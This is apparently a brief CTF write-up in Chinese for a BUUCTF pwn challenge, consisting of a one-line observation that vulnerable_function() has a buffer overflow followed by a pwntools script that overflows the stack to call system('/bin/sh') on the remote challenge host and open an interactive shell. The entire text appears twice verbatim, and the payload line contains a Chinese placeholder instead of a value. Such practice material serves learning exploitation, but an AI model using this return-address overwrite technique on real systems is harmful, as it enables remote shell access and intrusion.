双击点开vulnerable_function()
存在缓冲区溢出
from pwn import*
io=remote("node5.buuoj.cn",28377)
binsh=0x0804A024
sys_addr=0x08048320
payload=b'a'*(0x88+0x4)+p32(sys_addr)+p32(可为任意数值)+p32(binsh)
io.sendline(payload)
io.interactive()
双击点开vulnerable_function()
存在缓冲区溢出
from pwn import*
io=remote("node5.buuoj.cn",28377)
binsh=0x0804A024
sys_addr=0x08048320
payload=b'a'*(0x88+0x4)+p32(sys_addr)+p32(可为任意数值)+p32(binsh)
io.sendline(payload)
io.interactive()